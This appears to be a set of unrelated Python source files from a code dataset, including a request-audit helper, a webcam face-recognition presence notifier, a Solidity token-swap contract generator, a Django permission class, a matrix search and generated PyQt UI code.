auth_username = request_handler.application.identification.identify_for_audit(request_handler)
if auth_username:
result[AUTH_USERNAME] = auth_username
basic_auth_username = find_basic_auth_username(request_handler)
if basic_auth_username:
result[PROXIED_USERNAME] = basic_auth_username
proxied_ip = get_proxied_ip(request_handler)
if proxied_ip:
result[proxied_ip] = proxied_ip
proxied_hostname = _resolve_hostname(proxied_ip)
if proxied_hostname:
result[PROXIED_HOSTNAME] = proxied_hostname
remote_ip = request_handler.request.remote_ip
result[IP] = remote_ip
hostname = _resolve_hostname(remote_ip)
if hostname:
result[HOSTNAME] = hostname
return result
def _resolve_hostname(ip):
try:
(hostname, _, _) = socket.gethostbyaddr(ip)
return hostname
except:
LOGGER.warning('Could not get hostname for' + ip)
return None
def get_audit_name(all_audit_names):
audit_types = [AUTH_USERNAME, PROXIED_USERNAME, PROXIED_HOSTNAME, PROXIED_IP, HOSTNAME, IP]
for name_type in audit_types:
name = all_audit_names.get(name_type)
if name:
return name
return None
def get_audit_name_from_request(request_handler):
audit_names = get_all_audit_names(request_handler)
return get_audit_name(audit_names)
def find_basic_auth_username(request_handler):
auth_header = request_handler.request.headers.get('Authorization')
if (auth_header is None) or (not auth_header.lower().startswith('basic')):
return None
encoding = sys.getdefaultencoding()
credential_bytes = base64.b64decode(auth_header[6:])
credentials = credential_bytes.decode(encoding)
username = credentials.split(':')[0]
return username
def get_audit_username(all_audit_names):
return get_first_existing(all_audit_names, AUTH_USERNAME, PROXIED_USERNAME)
if __name__ == '__main__':
print(__file__) | python |
#!/home/jeffmur/archiconda3/envs/face_recon/bin/python3
import face_recognition
import cv2
import numpy as np
import pickle
from pathlib import Path
from datetime import datetime
import signal,sys,time
from google.cloud import pubsub_v1
# TODO (developer config)
project_id = "{GOOGLE_CLOUD_PROJECT_ID}"
topic_id = "{GOOGLE_PUB_SUB_ENDPOINT}"
# end config
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_id)
minDelta = 3 # seconds between publish events
class User:
# Initaliziation
def __init__(self, name, picturePath):
self.active = False
self.name = name
self.picture = picturePath
self.postTime = datetime.now()
def publishStatus(self):
if(self.active):
print(f"[{datetime.now()}] -- {self.name} Detected")
else:
print(f"[{datetime.now()}] -- {self.name} Left")
# Else publish event
status = "ACTIVE" if self.active else "LEFT"
data = f"{self.name}-{status}" #, self.keyIter)
# Data must be a bytestring
data = data.encode("utf-8")
# Add two attributes, origin and username, to the message
publisher.publish(
topic_path, data, update=status, user=str(self.name)
)
def updateStatus(self, isThere):
# Only send data every {delta} seconds
current_time = datetime.now()
diff = current_time - self.postTime
total = diff.total_seconds()
if(total <= minDelta): return
self.postTime = current_time
if(self.active != isThere):
self.active = isThere
self.publishStatus()
def newEncoding(self):
p = Path(f"{self.name}_face.dat")
if(not p.exists()):
# Load a sample picture and learn how to recognize it.
user_image = face_recognition.load_image_file(self.picture)
try:
user_face_encoding = face_recognition.face_encodings(user_image)[0]
except IndexError as error:
raise "No Face Recognized, please supply a higher resolution image!"
with open(f"{self.name}_face.dat", "wb") as face_data_file:
pickle.dump(user_face_encoding, face_data_file)
print(f"{self.name} face saved to disk.")
return user_face_encoding
else:
print(f"Loading {self.name} face from cache")
self.loadEncoding()
def loadEncoding(self):
try:
with open(f"{self.name}_face.dat", "rb") as face_data_file:
user_face_encoding = pickle.load(face_data_file)
print(f"Success! -- Loaded {self.name}")
return user_face_encoding
except FileNotFoundError as e:
print("No previous face data found - saving a new face!")
return self.newEncoding()
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
## Images and Names
# TODO: Users and local encodings
known_users = [User("Bob", "path/to/Bob.jpg"), User("Alice", "path/to/Alice.jpg"), User("Kevin", "path/to/Kevin.jpg")]
# Create arrays of known face encodings and their names
known_face_encodings = [x.loadEncoding() for x in known_users]
known_face_names = [x.name for x in known_users]
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
# Graceful exist
terminate = False
def signal_handling(signum,frame):
global terminate
terminate = True
print("Ready")
while True:
signal.signal(signal.SIGINT,signal_handling)
if terminate:
print('\n')
video_capture.release()
break
# Grab a single frame of video
ret, frame = video_capture.read()
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
# "Leaving" if face is not detected, set all status to false
if(face_encodings == []):
for user in known_users:
user.updateStatus(False)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
if(np.any(matches)):
# Use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
for u in known_users:
if(name == u.name): u.updateStatus(True)
face_names.append(name)
process_this_frame = not process_this_frame
# Display the results - Testing
# for (top, right, bottom, left), name in zip(face_locations, face_names):
# # Scale back up face locations since the frame we detected in was scaled to 1/4 size
# top *= 4
# right *= 4
# bottom *= 4
# left *= 4
# # Draw a box around the face
# cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# # Draw a label with a name below the face
# cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
# font = cv2.FONT_HERSHEY_DUPLEX
# cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# # Display the resulting image
# cv2.imshow('Video', frame)
# # Hit 'q' on the keyboard to quit!
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# Release handle to the webcam
# cv2.destroyAllWindows()
| python |
from eeval.evaluator import evaluate
from math import pi
import timeit
exprs = (
"2+2*2",
"(2+2)+(2+2)",
"-(2+2)+(-(2+2))",
"(2+2)*(-(2+2))",
"-(-(-(-(3*88888))))",
"pi*2",
"(pi+1)*(pi+2)",
"-pi",
"pi^2"
)
constants = {
"pi": pi
}
itercount = 1000
print("Evaluator test:")
for expr in exprs:
print(expr, "=", evaluate(expr, constants=constants),
"timeit: ", end="", flush=True)
print(timeit.timeit("e(expr, constants=c)", globals={
"e": evaluate, "expr": expr, "c": constants}, number=itercount)) | python |
from typing import Dict
from smartz.api.constructor_engine import ConstructorInstance
def is_true(arr, key):
return key in arr and bool(arr[key])
class Constructor(ConstructorInstance):
_SWAP_TYPE_ETHER = 'Ether'
_SWAP_TYPE_TOKENS = 'ERC20 tokens'
def __init__(self):
self._TEMPLATES: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS
}
self._CHECK_TRANSFER1: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1
}
self._CHECK_TRANSFER2: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2
}
def get_version(self):
return {
"result": "success",
"version": 1
}
def get_params(self):
json_schema = {
"type": "object",
"required": ["participant1", "participant2"],
"additionalProperties": False,
"properties": {
"participant1": {
"type": "object",
"title": "Participant #1",
"required": ["token", "count"],
"properties": {
"use_my_address": {
"type": "boolean",
"title": "Use my address",
"description": "Deployer's address would be got as participant #1 address",
"default": True
},
"token": {
"title": "Token address",
"description": "Address of ERC20 token smart contract, which participant #1 will swap",
"$ref": "#/definitions/address"
},
"count": {
"title": "Tokens count",
"description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether. Token decimals must be <= 18",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"dependencies": {
"use_my_address": {
"oneOf": [
{
"properties": {
"use_my_address": {
"enum": [
True
]
},
},
},
{
"properties": {
"use_my_address": {
"enum": [
False
]
},
"address": {
"title": "Address",
"description": "Address where tokens/ether from participant #2 will be sent",
"$ref": "#/definitions/address"
},
},
"required": [
"address"
]
}
]
}
}
},
"participant2": {
"type": "object",
"title": "Participant #2",
"required": ["swap_type"],
"properties": {
"swap_type": {
"title": "Swap type",
"description": "Swap tokens of participant #1 for participant's #2:",
"type": "string",
"enum": [
self._SWAP_TYPE_ETHER,
self._SWAP_TYPE_TOKENS
],
"default": self._SWAP_TYPE_ETHER
},
"use_my_address": {
"type": "boolean",
"title": "Use my address",
"description": "Deployer's address would be got as participant #1 address",
"default": False
},
},
"dependencies": {
"use_my_address": {
"oneOf": [
{
"properties": {
"use_my_address": {
"enum": [
True
]
},
},
},
{
"properties": {
"use_my_address": {
"enum": [
False
],
},
"address": {
"title": "Address",
"description": "Address where tokens/ether from participant #1 will be sent",
"$ref": "#/definitions/address"
},
},
"required": [
"address"
]
}
]
},
"swap_type": {
"oneOf": [
{
"properties": {
"swap_type": {
"enum": [
self._SWAP_TYPE_ETHER
]
},
"count": {
"title": "Ether count",
"description": "Ether count, which participant #2 will swap for participant #2 tokens",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"required": [
"count"
]
},
{
"properties": {
"swap_type": {
"enum": [
self._SWAP_TYPE_TOKENS
]
},
"token": {
"title": "Token address",
"description": "Address of ERC20 token smart contract, which participant #2 will swap",
"$ref": "#/definitions/address"
},
"count": {
"title": "Tokens count",
"description": "Tokens count, which participant #2 will swap for participant #1 tokens. . Token decimals must be <= 18",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"required": [
"token", "count"
]
}
]
}
}
},
"check_transfers": {
"type": "boolean",
"title": "Verify token transfers",
"description": "Verify that token balances of participants after swap are greater for the amount of transfer (or more). If not, the transaction will be canceled.",
"default": True
},
}
}
ui_schema = {
"participant1": {
"ui:order": ["*", "token", "count"],
},
"participant2": {
"swap_type": {
"ui:widget": "radio",
}
}
}
return {
"result": "success",
"schema": json_schema,
"ui_schema": ui_schema
}
def construct(self, fields):
swap_type = fields['participant2']['swap_type']
part1 = fields['participant1']
part2 = fields['participant2']
errors = self._check_errors(part1, part2, swap_type)
if errors:
return {
"result": "error",
"errors": errors
}
source = self._TEMPLATES[swap_type]
source = self._fill_check_transfers_dependant_vars(fields, source, swap_type)
source = self._fill_main_vars(part1, part2, source)
source = self._fill_swap_type_dependant_vars(part2, source, swap_type)
return {
"result": "success",
'source': source,
'contract_name': "Swap"
}
def post_construct(self, fields, abi_array):
if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER:
part2_type = 'ether'
else:
part2_type = 'tokens'
function_titles = {
'isFinished': {
'title': 'Is finished?',
'description': 'is swap finished',
'sorting_order': 10
},
'participant1': {
'title': 'Participant #1',
'description': 'Address of participant #1',
'sorting_order': 20
},
"participant1Token": {
"title": "Token address of participant #1",
"description": "Address of ERC20 token smart contract, which participant #1 will swap",
'sorting_order': 30
},
"participant1TokensCount": {
"title": "Tokens count of participant #1 (in token wei)",
"description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether (in token wei)",
'sorting_order': 40
},
"participant1SentTokensCount": {
"title": "Tokens count sent by participant #1 (in token wei)",
"description": "Tokens count, which participant #1 has already sent (in token wei)",
'sorting_order': 50
},
'participant2': {
'title': 'Participant #2',
'description': 'Address of participant #2',
'sorting_order': 60
},
'swap': {
'title': 'Swap',
'description': 'Swap tokens of participant #1 to {} of participant #2'.format(part2_type),
'sorting_order': 100
},
'refund': {
'title': 'Refund',
'description': 'Refund tokens/ether to participants',
'sorting_order': 110
},
}
if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER:
function_titles["participant2EtherCount"] = {
"title": "Ether count of participant #2 (in wei)",
"description": "Ether count, which participant #1 will swap for participant #2 tokens (in wei)",
'sorting_order': 70
}
function_titles["participant2SentEtherCount"] = {
"title": "Ether count sent by participant #2 (in wei)",
"description": "Ether count, which participant #2 has already sent (in wei)",
'sorting_order': 80
}
else:
function_titles["participant2Token"] = {
"title": "Token address of participant #2",
"description": "Address of ERC20 token smart contract, which participant #2 will swap",
'sorting_order': 70
}
function_titles["participant2TokensCount"] = {
"title": "Tokens count of participant #2 (in token wei)",
"description": "Tokens count, which participant #2 will swap for participant #1 tokens (in token wei)",
'sorting_order': 80
}
function_titles["participant2SentTokensCount"] = {
"title": "Tokens count sent by participant #2 (in token wei)",
"description": "Tokens count, which participant #2 has already sent (in token wei)",
'sorting_order': 90
}
return {
"result": "success",
'function_specs': function_titles,
'dashboard_functions': ['isFinished', 'participant1', 'participant2']
}
def _check_errors(self, part1, part2, swap_type):
""" Check additional errors"""
errors = {}
if "address" in part1 and "address" in part2 \
and part1['address'] == part2['address']:
errors['participant1'] = {
'address': "Participants addresses must be different"
}
if is_true(part1, "use_my_address") and is_true(part2, "use_my_address"):
errors['participant1'] = {
'use_my_address': "Participants addresses must be different"
}
if swap_type == self._SWAP_TYPE_TOKENS and part1['token'] == part2['token']:
if 'participant1' not in errors:
errors['participant1'] = {}
errors['participant1']['token'] = "Tokens addresses must be different"
return errors
def _fill_swap_type_dependant_vars(self, part2, source, swap_type):
if swap_type == self._SWAP_TYPE_ETHER:
source = source \
.replace('%_participant2EtherCount%', str(part2['count']))
else:
source = source \
.replace('%_participant2TokenAddress%', part2['token']) \
.replace('%_participant2TokensCount%', str(part2['count']))
return source
def _fill_main_vars(self, part1, part2, source):
part1_address = 'msg.sender' if is_true(part1, "use_my_address") else part1['address']
part2_address = 'msg.sender' if is_true(part2, "use_my_address") else part2['address']
source = source \
.replace('%erc20_basic%', self._TEMPLATE_ERC20) \
.replace('%_participant1%', part1_address) \
.replace('%_participant2%', part2_address) \
.replace('%_participant1TokenAddress%', part1['token']) \
.replace('%_participant1TokensCount%', str(part1['count']))
return source
def _fill_check_transfers_dependant_vars(self, fields, source, swap_type):
""" Fill check transfers templates"""
if 'check_transfers' in fields and fields['check_transfers']:
source = source \
.replace('%check_transfers1%', self._CHECK_TRANSFER1[swap_type]) \
.replace('%check_transfers2%', self._CHECK_TRANSFER2[swap_type])
else:
source = source \
.replace('%check_transfers1%', '') \
.replace('%check_transfers2%', '')
return source
# language=Solidity
_TEMPLATE_ERC20 = """
/**
* @title ERC20Basic
* @dev Simpler version of ERC20 interface
* @dev see https://github.com/ethereum/EIPs/issues/179
*/
contract ERC20Basic {
uint8 public decimals;
uint256 public totalSupply;
function balanceOf(address who) public view returns (uint256);
function transfer(address to, uint256 value) public returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER = """
pragma solidity ^0.4.18;
%erc20_basic%
/**
* Copyright (C) 2018 Smartz, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied).
*/
/**
* @title SwapTokenForEther
* Swap tokens of participant1 for ether of participant2
*
* @author Vladimir Khramov <[email protected]>
*/
contract Swap {
address public participant1;
address public participant2;
ERC20Basic public participant1Token;
uint256 public participant1TokensCount;
uint256 public participant2EtherCount;
bool public isFinished = false;
function Swap() public payable {
participant1 = %_participant1%;
participant2 = %_participant2%;
participant1Token = ERC20Basic(%_participant1TokenAddress%);
require(participant1Token.decimals() <= 18);
participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals()));
participant2EtherCount = %_participant2EtherCount% ether;
assert(participant1 != participant2);
assert(participant1Token != address(0));
assert(participant1TokensCount > 0);
assert(participant2EtherCount > 0);
%payment_code%
}
/**
* Ether accepted
*/
function () external payable {
require(!isFinished);
require(msg.sender == participant2);
if (msg.value > participant2EtherCount) {
msg.sender.transfer(msg.value - participant2EtherCount);
}
}
/**
* Swap tokens for ether
*/
function swap() external {
require(!isFinished);
require(this.balance >= participant2EtherCount);
uint256 tokensBalance = participant1Token.balanceOf(this);
require(tokensBalance >= participant1TokensCount);
isFinished = true;
%check_transfers1%
require(participant1Token.transfer(participant2, participant1TokensCount));
if (tokensBalance > participant1TokensCount) {
require(
participant1Token.transfer(participant1, tokensBalance - participant1TokensCount)
);
}
participant1.transfer(this.balance);
%check_transfers2%
}
/**
* Refund tokens or ether by participants
*/
function refund() external {
if (msg.sender == participant1) {
uint256 tokensBalance = participant1Token.balanceOf(this);
require(tokensBalance>0);
participant1Token.transfer(participant1, tokensBalance);
} else if (msg.sender == participant2) {
require(this.balance > 0);
participant2.transfer(this.balance);
} else {
revert();
}
}
/**
* Tokens count sent by participant #1
*/
function participant1SentTokensCount() public view returns (uint256) {
return participant1Token.balanceOf(this);
}
/**
* Ether count sent by participant #2
*/
function participant2SentEtherCount() public view returns (uint256) {
return this.balance;
}
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS = """
pragma solidity ^0.4.18;
%erc20_basic%
/**
* Copyright (C) 2018 Smartz, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied).
*/
/**
* @title SwapTokenForToken
* Swap tokens of participant1 for tokens of participant2
*
* @author Vladimir Khramov <[email protected]>
*/
contract Swap {
address public participant1;
address public participant2;
ERC20Basic public participant1Token;
uint256 public participant1TokensCount;
ERC20Basic public participant2Token;
uint256 public participant2TokensCount;
bool public isFinished = false;
/**
* Constructor
*/
function Swap() public payable {
participant1 = %_participant1%;
participant2 = %_participant2%;
participant1Token = ERC20Basic(%_participant1TokenAddress%);
require(participant1Token.decimals() <= 18);
participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals()));
participant2Token = ERC20Basic(%_participant2TokenAddress%);
require(participant2Token.decimals() <= 18);
participant2TokensCount = %_participant2TokensCount% ether / 10**(18-uint256(participant2Token.decimals()));
assert(participant1 != participant2);
assert(participant1Token != participant2Token);
assert(participant1Token != address(0));
assert(participant2Token != address(0));
assert(participant1TokensCount > 0);
assert(participant2TokensCount > 0);
%payment_code%
}
/**
* No direct payments
*/
function() external {
revert();
}
/**
* Swap tokens for tokens
*/
function swap() external {
require(!isFinished);
uint256 tokens1Balance = participant1Token.balanceOf(this);
require(tokens1Balance >= participant1TokensCount);
uint256 tokens2Balance = participant2Token.balanceOf(this);
require(tokens2Balance >= participant2TokensCount);
isFinished = true;
%check_transfers1%
require(participant1Token.transfer(participant2, participant1TokensCount));
if (tokens1Balance > participant1TokensCount) {
require(
participant1Token.transfer(participant1, tokens1Balance - participant1TokensCount)
);
}
require(participant2Token.transfer(participant1, participant2TokensCount));
if (tokens2Balance > participant2TokensCount) {
require(
participant2Token.transfer(participant2, tokens2Balance - participant2TokensCount)
);
}
%check_transfers2%
}
/**
* Refund tokens by participants
*/
function refund() external {
if (msg.sender == participant1) {
uint256 tokens1Balance = participant1Token.balanceOf(this);
require(tokens1Balance > 0);
participant1Token.transfer(participant1, tokens1Balance);
} else if (msg.sender == participant2) {
uint256 tokens2Balance = participant2Token.balanceOf(this);
require(tokens2Balance > 0);
participant2Token.transfer(participant2, tokens2Balance);
} else {
revert();
}
}
/**
* Tokens count sent by participant #1
*/
function participant1SentTokensCount() public view returns (uint256) {
return participant1Token.balanceOf(this);
}
/**
* Tokens count sent by participant #2
*/
function participant2SentTokensCount() public view returns (uint256) {
return participant2Token.balanceOf(this);
}
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1 = """
//check transfer
uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2 = """
//check transfer
assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1 = """
//check transfer
uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2);
uint token2Participant1InitialBalance = participant2Token.balanceOf(participant1);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2 = """
//check transfer
assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount);
assert(participant2Token.balanceOf(participant1) >= token2Participant1InitialBalance+participant2TokensCount);
"""
| python |
from django.contrib.auth import get_user_model
from django.utils.translation import gettext_lazy as _
from rest_framework import permissions
class ReadSelf(permissions.BasePermission):
"""Permits access to the (user)model instance if the user corresponds to the instance"""
message = _("You may only view your own profile.")
def has_permission(self, request, view):
if view.action_map.get(request.method.lower(), None) == "retrieve":
return request.user.is_authenticated or request.user.is_superuser
return request.user.is_superuser
def has_object_permission(self, request, view, obj):
if view.action_map.get(request.method.lower(), None) == "retrieve":
if request.method in permissions.SAFE_METHODS:
if isinstance(obj, get_user_model()) and obj == request.user:
return True
return request.user.is_superuser
| python |
from __future__ import annotations
def search_in_a_sorted_matrix(
mat: list[list], m: int, n: int, key: int | float
) -> None:
"""
>>> search_in_a_sorted_matrix(
... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 5)
Key 5 found at row- 1 column- 2
>>> search_in_a_sorted_matrix(
... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 21)
Key 21 not found
>>> search_in_a_sorted_matrix(
... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.1)
Key 2.1 found at row- 1 column- 1
>>> search_in_a_sorted_matrix(
... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.2)
Key 2.2 not found
"""
i, j = m - 1, 0
while i >= 0 and j < n:
if key == mat[i][j]:
print(f"Key {key} found at row- {i + 1} column- {j + 1}")
return
if key < mat[i][j]:
i -= 1
else:
j += 1
print(f"Key {key} not found")
def main():
mat = [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]]
x = int(input("Enter the element to be searched:"))
print(mat)
search_in_a_sorted_matrix(mat, len(mat), len(mat[0]), x)
if __name__ == "__main__":
import doctest
doctest.testmod()
main()
| python |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'PinOnDiskMain.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(537, 700)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(537, 700))
MainWindow.setMaximumSize(QtCore.QSize(537, 700))
MainWindow.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
MainWindow.setAcceptDrops(False)
MainWindow.setStatusTip("")
MainWindow.setAutoFillBackground(True)
MainWindow.setDocumentMode(False)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayoutWidget_3 = QtWidgets.QWidget(self.centralwidget)
self.horizontalLayoutWidget_3.setGeometry(QtCore.QRect(16, 4, 501, 85))
self.horizontalLayoutWidget_3.setObjectName("horizontalLayoutWidget_3")
self.gridLayout = QtWidgets.QGridLayout(self.horizontalLayoutWidget_3)
self.gridLayout.setContentsMargins(0, 5, 0, 5)
self.gridLayout.setSpacing(7)
self.gridLayout.setObjectName("gridLayout")
self.portCombo = QtWidgets.QComboBox(self.horizontalLayoutWidget_3)
self.portCombo.setObjectName("portCombo")
self.gridLayout.addWidget(self.portCombo, 1, 0, 1, 1)
self.conectarBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_3)
self.conectarBtn.setObjectName("conectarBtn")
self.gridLayout.addWidget(self.conectarBtn, 1, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_3)
self.label_3.setMaximumSize(QtCore.QSize(16777215, 15))
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.widget = QtWidgets.QWidget(self.horizontalLayoutWidget_3)
self.widget.setMinimumSize(QtCore.QSize(26, 26))
self.widget.setMaximumSize(QtCore.QSize(26, 26))
self.widget.setStyleSheet("")
self.widget.setObjectName("widget")
self.labelNotConnected = QtWidgets.QLabel(self.widget)
self.labelNotConnected.setGeometry(QtCore.QRect(0, 0, 26, 26))
self.labelNotConnected.setMaximumSize(QtCore.QSize(26, 26))
self.labelNotConnected.setText("")
self.labelNotConnected.setPixmap(QtGui.QPixmap("icons/led-red-on.png"))
self.labelNotConnected.setScaledContents(True)
self.labelNotConnected.setObjectName("labelNotConnected")
self.labelConnected = QtWidgets.QLabel(self.widget)
self.labelConnected.setGeometry(QtCore.QRect(0, 0, 26, 26))
self.labelConnected.setMaximumSize(QtCore.QSize(26, 26))
self.labelConnected.setText("")
self.labelConnected.setPixmap(QtGui.QPixmap("icons/green-led-on.png"))
self.labelConnected.setScaledContents(True)
self.labelConnected.setObjectName("labelConnected")
self.gridLayout.addWidget(self.widget, 1, 2, 1, 1)
self.gridLayout.setColumnStretch(0, 1)
self.horizontalLayoutWidget_5 = QtWidgets.QWidget(self.centralwidget)
self.horizontalLayoutWidget_5.setGeometry(QtCore.QRect(16, 560, 505, 41))
self.horizontalLayoutWidget_5.setObjectName("horizontalLayoutWidget_5")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_5)
self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.startBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.startBtn.setEnabled(False)
self.startBtn.setObjectName("startBtn")
self.horizontalLayout_4.addWidget(self.startBtn)
self.pauseBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.pauseBtn.setEnabled(False)
self.pauseBtn.setObjectName("pauseBtn")
self.horizontalLayout_4.addWidget(self.pauseBtn)
self.stopBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.stopBtn.setEnabled(False)
self.stopBtn.setObjectName("stopBtn")
self.horizontalLayout_4.addWidget(self.stopBtn)
self.testBtn = QtWidgets.QPushButton(self.centralwidget)
self.testBtn.setEnabled(False)
self.testBtn.setGeometry(QtCore.QRect(16, 528, 505, 28))
self.testBtn.setObjectName("testBtn")
self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(16, 612, 505, 53))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setVerticalSpacing(0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.progressBar = QtWidgets.QProgressBar(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressBar.sizePolicy().hasHeightForWidth())
self.progressBar.setSizePolicy(sizePolicy)
self.progressBar.setProperty("value", 0)
self.progressBar.setTextVisible(False)
self.progressBar.setInvertedAppearance(False)
self.progressBar.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.progressBar.setObjectName("progressBar")
self.gridLayout_2.addWidget(self.progressBar, 0, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.progressLabel = QtWidgets.QLabel(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressLabel.sizePolicy().hasHeightForWidth())
self.progressLabel.setSizePolicy(sizePolicy)
self.progressLabel.setScaledContents(False)
self.progressLabel.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.progressLabel.setObjectName("progressLabel")
self.horizontalLayout_6.addWidget(self.progressLabel)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
